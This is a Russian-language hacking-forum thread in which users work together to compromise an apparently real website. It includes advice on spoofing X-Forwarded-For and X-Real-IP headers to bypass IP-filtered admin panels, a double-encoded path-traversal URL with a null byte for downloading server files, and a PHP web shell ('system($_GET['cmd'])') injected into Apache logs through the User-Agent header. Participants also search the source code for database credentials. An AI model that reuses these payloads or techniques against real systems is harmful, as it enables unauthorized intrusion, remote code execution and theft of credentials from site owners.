ANTICHAT — форум по информационной безопасности, OSINT и технологиям

IP фильтруется в httpd.conf, X-Forwarded-For в этом случае может помочь? и можно подробнее о нем, а то что-то я не очень понимаю как правильно нужно его использовать.

Как проверить скачивается или выполняется?

Phpmyadmin если где-то и есть, то я не нашел его, хотя просканил на папки все, короче в явном виде не доступен.

Некоторые скрипты верят X-Forwarded-For, и можно передать хидер:

X-Forwarded-For: 1.1.1.1

Или(если установлен какой-то модуль, название не помню):

X-Real-IP: 1.1.1.1

Где 1.1.1.1 это айпи админа.

Например ../../var/www/index.php, тебе скачивается файл index.php, в нем есть "" ? Или html-код главный страницы?

попробовал include в логи apache на тестовом сервере (параметр user-agent). Действительно в логи записалась строчка 10.200.16.52 - - [15/Jul/2012:18:53:50 +0400] "GET /shell2/ HTTP/1.1" 200 54855 "-" , захожу через браузер в http://testsite.comf/shell2/access_log?cmd=phpinfo(); а apache php-скрипт по ходу не отрабатывает, а вываливает содержание лога(то есть в виде текста).

Может быть я что-то не так сделал?

мб файлы не инклюдяться, а просто выводиться содержимое?

в смысле не инклудяться?в логе же появляется php-скрипт, ток вот через браузер он не выполняется, а просто показывается содержимое лога, включая php-код. Если изменить файл лога на файл с расширением .php php-скрипт отрабатывается.

Но это я на тестовом сервере могу сделать(переименовать файл), а на удаленном не получится. Там access_log как был так и останется, как же php-скрипт внутри логов исполнить???

Увы это не прокатывает, так как фильтрация идет Апачем

Ааа в этом плане, нет скачиваются именно исходники, не выполненные, соответственно можно посмотреть все исходники и настройки сервака и.т.д но проблема в том, что узнать то все это можно, но войти с этими данными никуда нельзя из-за фильтрации админок по IP,

- порты тоже все прикрыты кроме 80 и 443

- соседних сайтов тоже никаких нет, на серваке только один портал

- сервисов каких либо тоже нет больше

В продолжение:

нашел такой скрипт со следующим содержанием

private $prepared_queries = null;

private $db;

private function __construct($name)

{

$config = BebopConfig::getInstance();

$cfg_root = 'db.'.$name.'.';

$this->prepared_queries = array();

$this->db = new PDO(

$config->getVar($cfg_root.'dbtype').':'.$config->getVar($cfg_root.'dsn'),

$config->getVar($cfg_root.'user'),

$config->getVar($cfg_root.'password')

);

$this->db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

$this->db->setAttribute(PDO::MYSQL_ATTR_USE_BUFFERED_QUERY , 1);

$this->db->exec("SET NAMES utf8");

}

public static function getInstance($name = 'live')

{

if (!array_key_exists($name, self::$instances)) {

self::$instances[$name] = new PDO_Singleton($name);

ника не могу определить имя файла, в котором предположительно настройки для подключения к БД хранятся, я так понимаю имя файл начинается с new PDO

на сайт в логи apache засунул через User-agent

'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>

Захожу http://site.com/attachment/..%252F..%252F..%252F..%252F..%252F..%252F..%252F. .%252F..%252F..%252Fvar%252Flog%252Fapache2%252Fsi te.ru_custom.log%2500.jpg

и вижу содержимое лог файла включая

91.221.56.225 - - [15/Jul/2012:21:47:24 +0400] "GET / HTTP/1.1" 200 64697 "-" "'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>"

Но php-получается не исполняется. Что делать?

gateout

Нет PDO расширение для php, интерфейс для доступа с различным базам данных